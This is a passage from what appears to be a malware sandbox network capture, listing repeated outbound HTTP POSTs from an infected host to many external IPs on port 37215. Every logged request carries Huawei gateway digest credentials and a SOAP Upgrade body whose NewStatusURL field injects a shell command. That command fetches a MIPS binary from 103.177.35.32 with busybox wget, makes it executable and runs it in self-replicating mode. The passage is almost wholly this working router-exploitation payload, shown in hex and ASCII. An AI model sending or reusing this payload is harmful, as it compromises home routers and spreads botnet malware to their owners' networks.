                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2836192.168.2.2359232197.31.110.22237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.650835037 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2837192.168.2.2356536169.204.255.21037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.650844097 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2838192.168.2.234006841.166.25.21337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.650850058 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2839192.168.2.235796241.188.108.3337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.650888920 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2840192.168.2.235966241.54.58.7137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.650918007 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2841192.168.2.2333406157.85.89.5437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.650995970 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2842192.168.2.2335242197.14.94.14537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651019096 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2843192.168.2.235108432.38.6.11237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651019096 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2844192.168.2.2351252157.188.49.9837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651020050 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2845192.168.2.2350450197.187.207.6637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651019096 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
